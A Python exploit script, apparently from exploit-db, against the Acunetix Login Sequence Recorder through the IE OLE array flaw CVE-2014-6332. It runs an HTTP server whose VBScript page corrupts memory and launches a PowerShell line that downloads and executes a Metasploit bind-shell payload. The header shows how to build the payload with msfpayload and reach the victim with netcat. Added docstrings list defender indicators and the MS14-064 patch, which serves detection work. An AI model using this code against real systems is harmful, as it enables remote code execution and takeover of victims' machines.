- #!/usr/bin/python
- import BaseHTTPServer, sys, socket
- ##
- # Acunetix OLE Automation Array Remote Code Execution
- #
- # Author: Naser Farhadi
- # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
- #
- # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
- # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record
- # Target Login Sequence
- # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/
- # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
- # Metasploit windows/shell_bind_tcp Executable Payload
- # And Finally You Can Connect To Victim Machine Using Netcat
- # Usage:
- # chmod +x acunetix.py
- # ./acunetix.py
- # Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
- # nc 192.168.1.7 333
- # Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
- #
- # Video: https://vid.me/SRCb
- ##
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Serve the two stages of the CVE-2014-6332 (MS14-064) PoC named in the header.

    ``do_GET`` distinguishes exactly two cases by request path:

    * ``/acunetix.exe`` -- the file ``acunetix.exe`` from the server process's
      current working directory is returned with ``Content-type: application/exe``.
    * any other path -- an HTML page is returned whose VBScript block, on a
      32-bit Internet Explorer client (``Navigator.UserAgent`` must contain
      ``MSIE`` and must not contain ``Win64``), uses ``Shell.Application`` to
      launch ``powershell -Command`` with an ``Invoke-Expression`` /
      ``DownloadFile`` line that fetches ``/acunetix.exe`` from this host and
      executes it.

    Defender notes, limited to what this file makes observable:
      - On the wire: a ``text/html`` response containing
        ``<SCRIPT LANGUAGE="VBScript">``, ``createobject("Shell.Application")``,
        ``Invoke-Expression`` and ``DownloadFile``, followed by a GET for
        ``/acunetix.exe`` answered as ``application/exe``.
      - On the client: the embedded IE host spawning ``powershell.exe`` with
        that command line, then a new ``acunetix.exe`` on disk being executed.
      - The VBScript is the public CVE-2014-6332 technique the header cites
        (``redim Preserve aa(a2)`` with ``a2 = a0 + &h8000000``); the
        corresponding Microsoft update (MS14-064) is the primary mitigation,
        and the ``Win64``/``MSIE`` checks mean 64-bit or non-IE clients are
        simply skipped.
    """
    def do_GET(req):
        """Answer every GET with status 200; the body depends only on ``req.path``.

        ``req`` is the handler instance (conventionally named ``self``).
        The status line and headers are sent before ``acunetix.exe`` is opened,
        so a missing payload file raises IOError after the 200 has already gone out.
        """
        req.send_response(200)
        if req.path == "/acunetix.exe":
            # Second stage: the msfpayload-built executable named in the header
            # comment, read from the process's current directory and streamed
            # back in one write.
            req.send_header('Content-type', 'application/exe')
            req.end_headers()
            exe = open("acunetix.exe", 'rb')
            req.wfile.write(exe.read())
            exe.close()
        else:
            # First stage: the HTML/VBScript page. The download URL inside the
            # VBScript function ``runmumaa`` is built at request time from this
            # host's resolved address (socket.gethostbyname(socket.gethostname())),
            # the same value the server binds to in __main__. Everything inside
            # the triple-quoted literal is runtime data and is left unchanged.
            req.send_header('Content-type', 'text/html')
            req.end_headers()
            req.wfile.write("""Please scan me!
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
end function
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function

end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)

Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

redim Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if


If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)

end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0)
end function
</script>""")
if __name__ == '__main__':
    # Bind TCP port 80 on the address this host name resolves to. That same
    # resolved address is the one the served page tells the client to fetch
    # /acunetix.exe from, so it must be reachable from the client side; if
    # the name resolves to a loopback or otherwise unreachable address the
    # second stage never downloads.
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
        # Block serving requests until Ctrl-C; the interrupt is swallowed so
        # the listening socket is closed cleanly below.
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    server.server_close()
https://www.exploit-db.com/exploits/36516/